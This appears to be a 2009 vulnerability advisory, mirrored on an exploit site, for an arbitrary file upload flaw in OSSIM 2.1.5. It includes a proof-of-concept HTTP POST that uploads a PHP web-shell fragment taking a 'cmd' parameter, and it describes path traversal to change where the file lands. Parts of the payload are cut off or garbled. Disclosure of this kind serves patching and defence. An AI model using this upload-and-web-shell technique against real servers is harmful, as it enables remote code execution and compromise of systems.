OSSIM v2.1.5 Arbitrary File Upload

ID 1337DAY-ID-10289
Type zdt
Reporter Nahuel Grisolia
Modified 2009-12-16T00:00:00


Exploit for unknown platform in category web applications

OSSIM v2.1.5 Arbitrary File Upload

Advisory Name: Arbitrary File Upload in OSSIM
Vulnerability Class: Arbitrary File Upload
Release Date: 12-16-2009
Affected Applications: Confirmed in OSSIM 2.1.5. Other versions may also be affected.
Affected Platforms: Multiple
Local / Remote: Remote
Severity: High – CVSS: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C)
Researcher: Nahuel Grisol?a
Vendor Status: Acknowledged/Fixed. New release available (OSSIM 2.1.5-4)
Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf
Vulnerability Description:
The vulnerability is caused due to an improper check in “repository_attachment.php” script, allowing
the upload of files with arbitrary extensions to a folder inside the Webroot. This can be exploited to e.g.
execute arbitrary PHP code by uploading a specially crafted PHP script containing some kind of Web
Shell. Also, using path traversal technique, an attacker can change the original destination path.
Proof of Concept:
1) Select a file with any extension (including PHP) and upload it using the form. The file will be
available in: /ossiminstall/uploads/(DOC_ID_FOLDER)/(DOC_ID).php
2) Using path traversal technique, an attacker can write into other directory, like tmp, inside the
POST /ossim/repository/repository_attachment.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv: Gecko/20091109 Ubuntu/9.10
(karmic) Firefox/3.5.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------
Content-Length: 689
Content-Disposition: form-data; name="id_document"
Content-Disposition: form-data; name="atchfile"; filename="R4nd0mF1l31tdoesntmatter.php"
Content-Type: text/vnd.wap.wml
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
if($_GET['cmd']) {
and then, browse /ossiminstall/tmp/_(DOC_ID).php
Direct execution of arbitrary PHP code in the Web Server.
Solution: Upgrade to OSSIM 2.1.5-4
Vendor Response:
2009-12-08 – Vulnerability is identified
2009-12-09 – Vendor is contacted
2009-12-09 – Vendor confirmed vulnerability
2009-12-16 – Vendor released fixed version
2009-12-16 – Vulnerability is published

#  0day.today [2018-03-20]  #